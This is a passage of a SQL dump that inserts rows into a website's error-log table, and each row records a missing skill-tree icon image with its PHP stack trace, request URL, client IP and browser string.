'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 81, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (511, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_impalingbolt.png\' found.', 'c26d043161a6b784db442313549e5b098605f263', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_impalin...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_impalin...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_impalingbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 79, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (512, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_townwatch.png\' found.', 'cdbe462bef23b88f8f266a15794406a52af89302', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_townwat...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_townwat...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_townwatch.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 77, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (513, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_quickshot.png\' found.', 'aa2dbe532bc47bd080c6184f83b2415722224c20', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.036, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_hunter_quickshot.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 75, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (514, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_piercedamage.png\' found.', '7a318609517678874131610a1975487d6f942a4f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_pierced...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_pierced...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_piercedamage.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 73, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (515, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_golemstormbolt.png\' found.', '1563511d3cda4ad474051d59ec793bfa9d45371c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_golemst...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_golemst...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_golemstormbolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 71, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (516, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_upgrademoonglaive.png\' found.', '1aed8383110fc97ac63d466bdf1e99653435511f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_upgrade...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_upgrade...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.06, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_upgrademoonglaive.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 69, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (517, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_hunter_criticalshot.png\' found.', 'bdc7cca33b103e788edc743aaa3efc5958bfe382', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_hunter_...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_hunter_...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.048, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_hunter_criticalshot.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 67, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (518, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_weapon_rifle_06.png\' found.', 'b4f9e6a27d9673a448bdad028c1a10e274b3639d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_weapon_rifl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_weapon_rifl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.048, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_weapon_rifle_06.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 65, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (519, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_trueshot.png\' found.', 'c4020bd63b7682ce33966de11d52c8cdf348e924', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_truesho...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_truesho...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_trueshot.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 63, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (520, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_misc_dragon_black.png\' found.', '2ec17c6623f362058ed84e17e6ca11f1d27c8a0d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_misc_dragon...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_misc_dragon...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-13 23:02:53', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_misc_dragon_black.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (521, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_misc_head_dragon_black.png\' found.', 'd51036be588b8138ed572b6e1cd4ca4873086334', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_misc_head_d...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_misc_head_d...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_misc_head_dragon_black.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 59, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (522, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_trip.png\' found.', 'ca8c6338f2f60ce8f42793386c805db285f706be', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_t...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_t...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_trip.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 49, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (523, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_timestop.png\' found.', 'ef72125f6834cde9fb3175f622098827e8bae1b7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_ti...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_ti...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:47:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_timestop.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 48, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (524, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_twilight.png\' found.', '1958ce3e9efe7a6b1218a1bfcdedc8770e2b3f31', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_tw...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_tw...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_twilight.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 195, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (525, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_whirlwind.png\' found.', '57d313d8c54f3e285c81e8e30a45617657d1e5ae', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_whirlwi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_whirlwi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_whirlwind.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 42, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (526, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_ensnare.png\' found.', '7bda05ae0e227a610430a594e300e1c77d7401b4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_ensnare...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_ensnare...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_ensnare.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 41, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (527, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_kick.png\' found.', 'd38da1314264fcdad7a8ec665af19850049b5c55', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_kick.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_kick.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_kick.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 123, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (528, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_feigndeath.png\' found.', '84e3a0e1979d65bbf0c8526f7da4c7d1f2eacd3e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_f...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_f...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_feigndeath.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 163, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (529, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_challenge.png\' found.', '32cccc4245d35f66c75a91bd261e33e7da8d946f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-13 23:08:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_challenge.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (530, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_challange.png\' found.', '78d5de29e3dd1319563e7c222c01ef171ce217b3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_warrior_challange.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 